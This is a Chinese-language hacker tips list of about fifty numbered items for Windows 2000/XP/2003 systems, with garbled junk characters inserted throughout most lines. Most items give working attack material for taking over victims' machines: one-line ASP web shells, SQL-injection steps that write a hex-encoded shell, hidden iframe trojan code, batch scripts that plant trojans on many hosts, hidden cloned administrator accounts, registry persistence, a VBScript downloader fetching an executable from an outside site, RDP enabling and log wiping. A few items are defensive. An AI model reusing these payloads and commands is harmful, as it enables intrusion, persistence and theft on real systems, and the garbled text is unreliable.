Xp系统修改权限防止病毒或木马等破坏系统,cmd下,8 k2 i5 S' k5 N
cacls C:\windows\system32 /G hqw20:R3 F; K0 R: P$ z
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
6 n* d+ Z# M" ?9 `: n+ z2 H6 J0 s恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F) {' z3 ~3 d2 X+ I q* X& E
7 d! h$ W- I7 q- F
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
4 G- z+ w& t+ e/ T0 o' O
. q$ o6 t7 c, [3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。. k. e6 q; _' p b
8 K, _8 k3 ^5 V/ |4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
0 e& O9 i3 Y7 a1 G& F3 g; }- ?1 i: _
5、利用INF文件来修改注册表
) L; J3 M7 P, w \[Version]
4 W5 S! R! ^ Z( {1 m' O9 d0 hSignature="$CHICAGO$"( s% c% G7 h9 G+ W
[Defaultinstall]
( n9 Y9 [$ n baddREG=Ating
2 g# r1 J& t8 A' W7 h[Ating]
4 f/ L4 @7 Q) n6 k3 `* {HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"+ T' o- U) w4 j* K/ L) A8 A$ c
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
) e8 _6 h- v+ h$ Irundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径, C1 Q, q! s8 W# h4 A; e6 I
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
) d* t' w3 {( _2 J0 x/ p8 y4 K! JHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU6 ?. [7 C1 @! M9 H! m
HKEY_CURRENT_CONFIG 简写为 HKCC
: p$ j* P* X" ^0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
0 M8 z. W# [4 m' w" F7 c' S+ d& U0 K"1"这里代表是写入或删除注册表键值中的具体数据. X8 x0 o1 B6 G# N" [
1 O B* e, `" L/ H, [+ f7 \ Z6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画," z0 {6 K- v/ J, R2 a
多了一步就是在防火墙里添加个端口,然后导出其键值) m. P3 v& S+ q0 o- ]) `- L
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
% d% _1 I+ ]% t$ U9 y6 l" I
+ ~0 e4 a6 \1 q7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
$ o( w& ^7 d$ Z- v8 j4 [在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。0 a- ?6 t5 O* g/ W. ?0 F
; G. D! ~' u- s9 ]& _' j8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
0 K+ i; x4 y5 x' |- I; a3 e
' ?0 j- d, a' R% F# p# K3 S9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,4 L4 V/ r/ M! G6 C t
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
/ j& [: {* h. c5 i# {4 H. Z3 m0 o; o! l2 H3 Y9 z5 O/ F
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”( d- }9 a- @/ C z9 w$ l5 c
( c* u ?4 H7 O) r$ Z* C& C9 k
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
1 F0 r: ]: d" o* f用法:xsniff –pass –hide –log pass.txt* z8 E7 d6 H% f1 J' D
" X3 k) R: h/ o6 ], i& I3 i* B
12、google搜索的艺术7 e2 V- @7 o! a: y2 ~. E
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”3 \2 Q& A5 |# P& j: z3 M8 K- S; `
或“字符串的语法错误”可以找到很多sql注入漏洞。 c5 b& `, w) U/ w
# x5 t$ h# O5 \) q7 [13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
& w( t8 u$ K& Y3 P+ _! \% @( o3 j6 z: f$ @ C
14、cmd中输入 nc –vv –l –p 1987
; A( H, X9 n) ^7 d做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
: Z0 q) x: u% ?) a
; L( ~0 e+ F/ i! `15、制作T++木马,先写个ating.hta文件,内容为6 Z% I3 M1 r7 `- I3 g, V
<script language="VBScript">
! @2 h, f; S' [; W$ l# _, K3 d6 tset wshshell=createobject ("wscript.shell" )
' W( R I, `; r$ o1 I1 Y2 G$ Ka=wshshell.run("你马的名称",1)
) r" d2 I B' `: }% Q; Swindow.close
+ U" d' a# P4 }3 n: L. G</script>9 W6 N: p) D; V: q
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
/ i4 g# e; p7 d1 \4 q, s; p& C! ^1 Q6 K& v# A9 c S0 t
16、搜索栏里输入
: j3 L1 W9 m- _! w3 ?( ?. ^% G关键字%'and 1=1 and '%'='" H: q$ k8 c5 u6 N
关键字%'and 1=2 and '%'=': M/ j4 c/ {* l
比较不同处 可以作为注入的特征字符
) _6 N1 Y8 G$ j/ v& j, Y/ s) b q" }: `! p2 m+ q
17、挂马代码<html>
1 c& V# ]1 M7 e4 d<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>6 `+ A/ @2 k5 g& Q
</html>/ @/ D" H. ?, n5 @2 V2 n
u) z; c* K# B- f" g) C# x
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,7 r5 h& g3 w* \$ t
net localgroup administrators还是可以看出Guest是管理员来。: J6 `8 L2 A, Z% @# j
& h& Q) s! P6 B4 r/ `6 E
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
2 n8 a1 u: W' z- _0 Y8 c7 x6 O用法: 安装: instsrv.exe 服务名称 路径
8 {; p6 x& V; U5 h( l卸载: instsrv.exe 服务名称 REMOVE& z; p/ s1 r5 X4 R2 f! @
) x, s) H, g1 b5 M2 H; w+ f* Y. p) Y G# x7 u5 c
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉: j5 w8 C+ x! S8 A5 m4 v2 i
不能注入时要第一时间想到%5c暴库。
& ?# i4 r# t+ I3 J z: X7 x' X' c0 R8 t: x* V
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
" L- B& Y# g9 i6 _2 v% }4 p# U3 q7 e; b$ N
23、缺少xp_cmdshell时
" e( g7 n% J) r% A: X' f( l [尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'" w! z$ D5 `5 C4 z
假如恢复不成功,可以尝试直接加用户(针对开3389的)
6 c0 b2 n) s" W) W- {2 @- Q# Hdeclare @o int* s" H" Y f: I, N9 G2 \% ~& m& w& T
exec sp_oacreate 'wscript.shell',@o out
{2 x Q% ~9 Dexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
6 p1 n; h1 v9 q5 P2 t. p9 t- M
3 r B7 }/ X7 Q" `7 I C% Y24.批量种植木马.bat1 Z8 B7 Z, A. E8 G& m+ v/ t
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
5 D+ b+ n; K+ D0 F2 t/ ffor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间* G. ]4 B P4 F
扫描地址.txt里每个主机名一行 用\\开头
5 _ w+ B, G1 i7 z' k; @% ~4 o% I o* o3 [: _$ ^- @7 @4 _( E$ d
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
" Q& E2 @% D4 D @; {
& L/ Z/ O; K" f& G; q0 H; s26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.) \! d. a- }2 R0 Q
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
& j, w; B% Y! a& K7 {.cer 等后缀的文件夹下都可以运行任何后缀的asp木马2 S+ E, Q1 N( D
: I' H/ y. D5 |6 n) _5 I# x( t/ T27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
9 i0 e; l* S" a9 T |; s6 c然后用#clear logg和#clear line vty *删除日志
, y3 i; P- B) s U5 @/ b% J8 |9 s, k- W" q% r2 d2 r" a
28、电脑坏了省去重新安装系统的方法
* ~ U8 c ^8 k; Z2 m纯dos下执行,
* s4 ]$ }( _/ Rxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config4 A0 T9 D- [/ }, J5 e$ O
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config0 j0 e# \7 x8 |4 H+ X
8 ]1 [/ ?6 f5 @* |
29、解决TCP/IP筛选 在注册表里有三处,分别是:
* j' Q# s b% s" Q- [" ^% ^HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
/ m- p$ l& V8 b4 D0 ~! I0 oHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip: H4 ]) c. U% d7 P
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip8 d/ O! w3 J3 F) _2 y0 O
分别用 \' m' B1 G- c7 w% L
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip3 e" u, B t8 n6 X" M% E; ]3 j( ~
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
H5 H; W3 t! ~, E& v7 ~/ vregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
$ ?- I8 ~( P7 ~( k/ I, h命令来导出注册表项
6 X) g! s# W! v然后把三个文件里的EnableSecurityFilters"=dword:00000001,
+ U/ Q! B5 {! Z1 L. {改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
* G1 m2 t) d) Y/ Kregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
) h; }' Y3 m* x3 A5 ?% x
* B; x; j0 v' K8 w30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
7 R1 j- D6 L: z: S. `& `# Q/ |SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的33 t0 F$ y5 k$ o0 K3 \
% X( f1 p/ i$ z9 t9 _; [, d
31、全手工打造开3389工具# p7 b+ x" ~. {# r O- Z3 q) e7 x
打开记事本,编辑内容如下:
. F7 u. h& O) U$ {0 C1 x$ oecho [Components] > c:\sql
* p1 }, y# v' t& J8 i/ k/ Decho TSEnable = on >> c:\sql
3 }7 u I. k/ {4 J" ysysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
. b" x0 W- [6 I* d) B4 a* e编辑好后存为BAT文件,上传至肉鸡,执行- C8 z9 f/ J# l6 X) L+ t
& `; R: {# g7 m' A3 K/ e3 [& {. R* ?32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马! O% d/ H+ a6 [
w ]4 w3 b5 i0 B) `
33、让服务器重启
" I8 W) H0 q1 ?2 j写个bat死循环:
/ f- R' g' ]8 c@echo off
) k: `; m+ U+ D1 a:loop1
0 S$ @+ y* F- }! d$ a$ B6 Tcls
4 I! d: P K& u8 x7 [- Ostart cmd.exe5 K4 B& n/ r5 s7 S. X" { M; Q7 S9 }
goto loop10 M; q! j5 d+ ^7 p& X. a
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
4 H. e# N8 W+ l( D$ S8 z V
+ a5 J; w7 }1 i* c" W* Y2 `34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,* c9 N: R, Y. I# J1 x1 y
@echo off
6 V( }/ r5 @9 }date /t >c:/3389.txt$ T3 c5 p' D' I+ ~! |
time /t >>c:/3389.txt
N% m8 E& m3 a) X+ }5 R# n! mattrib +s +h c:/3389.bat* Z6 K% u9 n4 E8 X
attrib +s +h c:/3389.txt% {* N4 Y" s/ O3 P W5 r# }+ d- ~
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt' I8 y- U$ s) e( F! |
并保存为3389.bat, {7 b' |- G* U% E" H6 d) A% D
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
# x- l9 ~$ w! Q! r) L- G" X" N7 Z" e3 D" g9 w6 m+ L/ l# l! N( w
35、有时候提不了权限的话,试试这个命令,在命令行里输入:; {6 I5 u6 Y: c# ~( \6 Y- M1 |
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)7 o6 p0 P# E1 h7 s* o: F Z. r8 t' C
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
% I7 v% O* l1 ]1 z3 \ g" Q1 i9 I& w0 E3 _
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
; q3 w" O$ y4 becho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
$ c q$ c% {( T+ ^' fecho 你的FTP账号 >>c:\1.bat //输入账号, ?! J/ f" e; Z6 v1 p
echo 你的FTP密码 >>c:\1.bat //输入密码0 Z' `! |3 _/ e! ]8 l: a9 j$ C4 b
echo bin >>c:\1.bat //登入
- N3 H& t( M5 d. Z! ?echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么. W5 G6 h* N+ n I1 ?2 P, I
echo bye >>c:\1.bat //退出6 b! h; ?% i! A9 M* B2 a# ?) ?: ?( |
然后执行ftp -s:c:\1.bat即可2 i. T; N+ D0 `9 |7 T+ N6 ^9 F
( a7 c2 s# ]" E! L" L. B9 y
37、修改注册表开3389两法/ {5 b+ x/ z" C+ ~6 y1 v
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表9 o0 y1 v( d+ H8 N Z* c' J
echo Windows Registry Editor Version 5.00 >>3389.reg
% b Q! A& K% ^/ L& G T% {echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
5 _3 l9 v; d" Q! ?& {% s: o8 eecho "Enabled"="0" >>3389.reg8 z; y$ m1 K' T7 p( ^; k7 P
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows6 d; C6 z1 Y& p2 |" I3 } O& z4 |3 w
NT\CurrentVersion\Winlogon] >>3389.reg5 J& B7 m" r( I; L& `
echo "ShutdownWithoutLogon"="0" >>3389.reg
' P) u$ j% k9 D& g8 decho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
+ q+ j5 M/ D- A( y>>3389.reg
! o7 a. A! k* c! J' ^echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg* { R1 P8 j, v* I
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
3 N! D3 a7 A: S9 N2 K) R>>3389.reg% Q \7 s$ H+ `1 C# V/ |
echo "TSEnabled"=dword:00000001 >>3389.reg
5 \% n7 G" [ g0 pecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg- L/ z# W; L' L. Y& k8 V
echo "Start"=dword:00000002 >>3389.reg- T) A. r7 q6 m; p- c4 M, V9 E
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]( [5 ?2 b+ w F2 @. R
>>3389.reg8 ] k( D* q3 A/ {
echo "Start"=dword:00000002 >>3389.reg
9 I% b- ?* J& S. N W5 decho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg) I( S) B8 ~9 P# u5 P+ H
echo "Hotkey"="1" >>3389.reg% Z6 S3 {) X5 m9 J& R( g" @; i
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal' d8 B. ^3 a5 s
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
% Z/ |! o; \* q: v8 Techo "PortNumber"=dword:00000D3D >>3389.reg
7 `5 ]! o2 v% [% necho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal1 t/ D7 F2 V, p
Server\WinStations\RDP-Tcp] >>3389.reg0 x3 d/ f( j) A% E) o. a) R! n
echo "PortNumber"=dword:00000D3D >>3389.reg
2 e% v5 J/ i6 a把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
& s( \! _+ e, M/ ]) `(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
/ s4 i6 w( X$ d! z2 A8 S因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
; X, Q& y1 c/ A) X(2)winxp和win2003终端开启
4 R4 J# w/ a/ h用以下ECHO代码写一个REG文件:7 l2 B( k3 ^# v: m' o& q& ]5 p) U
echo Windows Registry Editor Version 5.00>>3389.reg
3 O$ y: }2 q( w6 Y P: @# R4 w, cecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
2 B& A9 j* n) i+ b# oServer]>>3389.reg
. ]4 r6 q+ X) N8 j" Kecho "fDenyTSConnections"=dword:00000000>>3389.reg
- f1 G5 ^- N& K/ k5 t8 Aecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
' J# y& Z/ p" d" JServer\Wds\rdpwd\Tds\tcp]>>3389.reg2 Y& i6 e" P8 q/ F6 V2 h
echo "PortNumber"=dword:00000d3d>>3389.reg4 [" U3 t4 ^! M% @" ~; A% p" D6 h& p
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal f% K \+ F- @3 Y5 E/ Y
Server\WinStations\RDP-Tcp]>>3389.reg/ C" Y% P; f8 f9 Q7 _6 b% p
echo "PortNumber"=dword:00000d3d>>3389.reg3 z1 X+ X5 E2 R9 K d: N& f! U
然后regedit /s 3389.reg del 3389.reg
5 @$ i- ~8 c# v, w- vXP下不论开终端还是改终端端口都不需重启8 S+ ?4 n5 e+ W% g
7 g% h1 Y; D; L# U
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃( F2 f' i4 V( G/ j
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
( Q2 q- V6 Z, x3 V, R* C+ @0 }2 X6 a6 i4 ~$ p) u
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!: J; e5 p( B+ U* x8 A
(1)数据库文件名应复杂并要有特殊字符, Q1 i. r' R. M% Z/ x* f% K
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
+ a- T7 j' R$ y; M将conn.asp文档中的) J: c- F5 T: ^3 n0 D, {
DBPath = Server.MapPath("数据库.mdb")' p. e, z' k4 U+ P5 S, Q
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath7 U1 E/ t/ d. o- ?
M% W9 v/ S3 \: h5 _修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置7 U4 g( z; Y [5 }# X) O7 q! T* e
(3)不放在WEB目录里) z7 v2 v- {. S' M0 q+ G
' S6 U- J S9 I8 v; @
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉. z0 Z [8 [8 T
可以写两个bat文件
m8 {( x, E6 P" M) v7 M@echo off
: \- i5 m6 ?. x) m+ F: Q@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
) E" U) X, q4 `@del c:\winnt\system32\query.exe
; k5 J& A5 B5 r5 C e/ }6 y& }@del %SYSTEMROOT%\system32\dllcache\query.exe' h K( N4 s* Q7 w4 r$ K6 t
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的& t) R2 C8 I9 F& ~
! Z) ]3 n& J, A) t i7 p1 q% k: U
@echo off
8 Z. J" `. f* u/ G0 G W9 J- X@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe# o7 f/ \3 F+ w& R4 C% {# ~
@del c:\winnt\system32\tsadmin.exe4 {' H+ s+ m7 G/ @1 M/ A) |
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex i" ]8 l- P0 V: N* P+ x7 U2 y; T$ y
9 F) m7 L* r- A6 e; ?( a41、映射对方盘符5 j6 v" H- w" y) a8 a2 ]7 o+ S
telnet到他的机器上,
# f- x- X1 h1 g0 p6 M& Qnet share 查看有没有默认共享 如果没有,那么就接着运行
- E* p; K' j6 L5 gnet share c$=c:% i2 d9 w$ y9 K" W, Z" E
net share现在有c$7 u" O' h/ ~; d
在自己的机器上运行8 G& `# ]5 z* ] ^! V
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K) ~4 Q, d, ~2 c
0 e! e9 ?- E2 Z" l' _42、一些很有用的老知识7 d/ ^7 v# j, U# N) \; G9 W
type c:\boot.ini ( 查看系统版本 )
/ u, v4 [$ q! u2 ~0 o/ U9 j' _net start (查看已经启动的服务)* o" t: e9 P% o4 A( E
query user ( 查看当前终端连接 )
4 x3 ~( ^( H3 n; [( w# Cnet user ( 查看当前用户 )6 E7 h$ Q# ~' s) I, G
net user 用户 密码/add ( 建立账号 )
+ v2 n2 y6 l! Dnet localgroup administrators 用户 /add (提升某用户为管理员)8 P: F2 |" m3 B! q- y; H
ipconfig -all ( 查看IP什么的 )' u, l# G" e7 ~" _& [! j
netstat -an ( 查看当前网络状态 )- P; F/ _" d' ]% r9 z9 n/ {$ O
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)+ [' J" V. L. a! l* _( ^9 |$ h" N
克隆时Administrator对应1F45 v2 B- \) q0 y: m
guest对应1F5
* u1 ]9 [" ` Y- i5 a, S! }3 Ntsinternetuser对应3E8/ d+ l e/ T, A' e* Z8 F
" O/ U7 i0 Q8 X3 m43、如果对方没开3389,但是装了Remote Administrator Service7 x+ @4 j) F1 P2 k- l" W
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
) J) @ _* x* ^2 V9 F7 l2 j5 V+ @0 g解释:用serv-u漏洞导入自己配制好的radmin的注册表信息& Y1 [ d1 F# d4 ~
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"1 v( v: n1 f4 S- G% p4 D; b" _
3 o* \5 }$ l' n$ b
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)' ~" w0 F6 O% D1 H/ q0 q3 H
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
0 _( }8 `" S3 `4 |/ n$ k' d) J( a2 E7 d# S! W
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
* j5 L$ p" k- ^) oecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
. s) Y6 ~7 k* q( a2 B" W$ j) \^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
5 h/ G' G/ D: l$ ^CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =$ W5 ]0 R! g$ M- G, s |
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs1 ?) P# v) e, E7 O2 |
(这是完整的一句话,其中没有换行符)
( m( k( k' c# R* _( H3 |$ y然后下载:$ t1 `. s: o, G8 e
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
% S9 |& n! X% S7 F4 U8 _+ d4 ^- h0 \. Y# `) Q( ]4 d7 \7 |" l( T) }
46、一句话木马成功依赖于两个条件:
$ ^$ h3 J4 ?! g2 i1、服务端没有禁止adodb.Stream或FSO组件! { Y% u7 X) x0 \/ G
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。/ h2 |1 E" p% T% ^& E8 m9 B
' I- {4 e2 z# w; |47、利用DB_OWNER权限进行手工备份一句话木马的代码:
7 p4 J( G1 L1 p5 k% s- K5 e;alter database utsz set RECOVERY FULL--
: u) j. d# v% D;create table cmd (a image)--
# x1 o8 H- _- ]0 w;backup log utsz to disk = 'D:\cmd' with init--
1 M G# C$ J3 _2 E+ u;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--6 a; k" |* ]2 ?0 ]1 \$ b
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--* H, l. T, K W2 P
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。! H5 c0 d! H! n7 T* J9 D5 B$ N
. y( k9 n2 X# N$ Q. i5 v48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
' W. S. |, k9 \, |. i* w& L" n, k$ K
8 w( l2 v" @, M5 r& {! [( G/ I) S9 U用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
+ s5 o. F a3 k- j) a6 e2 e6 s( n所有会话用 'all'。
6 t( w! [5 R# I1 u; I- i-s sessionid 列出会话的信息。" D9 `! d4 r( c
-k sessionid 终止会话。
3 e7 v& ?2 m7 q% g6 Y5 Z5 z. Q-m sessionid 发送消息到会话。% r4 R+ [, m, M6 @
! W- @) L5 P7 [+ _config 配置 telnet 服务器参数。: m' c% Q2 r4 M# M
# d1 w& i3 ?# t1 M
common_options 为:5 x+ O7 ~1 Q$ v+ a! z/ a
-u user 指定要使用其凭据的用户
" j) Z% S5 W1 }. _- \. R: t" m-p password 用户密码
i& a+ b; w# f! W
; ]: r8 q( G" ^) |& zconfig_options 为:
" k7 t. w. h8 odom = domain 设定用户的默认域
0 ~8 I6 A: Z2 u8 ]ctrlakeymap = yes|no 设定 ALT 键的映射# J7 B1 K8 Q' ]9 S0 b
timeout = hh:mm:ss 设定空闲会话超时值0 j1 T- L' @) h4 v
timeoutactive = yes|no 启用空闲会话。
) w/ w$ v$ w% D; imaxfail = attempts 设定断开前失败的登录企图数。
; O5 b& A6 H8 i6 G- z$ p! V2 s1 amaxconn = connections 设定最大连接数。$ M7 H0 N3 l0 K3 [
port = number 设定 telnet 端口。
J2 r- B D4 @8 ~4 T) Gsec = [+/-]NTLM [+/-]passwd( m. C4 ` K, n8 M! S& C
设定身份验证机构
; P/ ]9 c7 s6 ]fname = file 指定审计文件名。9 `1 x0 M2 U/ i5 S3 h$ g
fsize = size 指定审计文件的最大尺寸(MB)。8 X9 w {0 z$ S- o0 R
mode = console|stream 指定操作模式。! `5 n/ K, Z }* D
auditlocation = eventlog|file|both
* A7 h. F* C( o$ ~( g6 e) ~+ i, N( V' I指定记录地点" z! Y6 d/ }$ g2 r. T3 i. I
audit = [+/-]user [+/-]fail [+/-]admin
" m/ K* `! k J7 R8 y; j$ I
" O$ P' X+ P- W5 {49、例如:在IE上访问:
, k* z; n7 s. X- n( S: U/ }$ J& Jwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
% g; F) _6 d, q7 }0 O, `hack.txt里面的代码是:
* Y. s. `2 F) g<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/"># O/ [' u" P4 g3 i$ C% R) a& g* ]
把这个hack.txt发到你空间就可以了!5 s* m" [! I9 Q- S
这个可以利用来做网马哦!1 t! g7 O4 U: k" h. ~7 [
" x' f, p/ i1 Y$ ?" E6 v3 S
50、autorun的病毒可以通过手动限制!( H6 z2 o; ^. {' E
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!$ Q/ c p7 j% k7 ]4 E/ ~, I% A
2,打开盘符用右键打开!切忌双击盘符~' i; W* t& Q) r3 }3 ]$ z7 q2 ^
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!" u7 i) i1 i% p6 C+ O, R: f
6 C3 j4 ^6 b4 v51、log备份时的一句话木马:
3 Q$ \' T2 q0 `' \2 O- Z+ ma).<%%25Execute(request("go"))%%25>) R5 j# l# S- a- B0 v4 ]
b).<%Execute(request("go"))%> o' n! C/ F' P; I6 R- e0 t
c).%><%execute request("go")%><%3 L* _6 E- v: K% n8 X4 L5 {
d).<script language=VBScript runat=server>execute request("sb")</Script>
0 ~% \4 H1 l6 |- F8 y+ Ke).<%25Execute(request("l"))%25>% \" S0 U% G) {6 Q9 W0 m
f).<%if request("cmd")<>"" then execute request("pass")%># m/ a% W) h) x+ `8 y
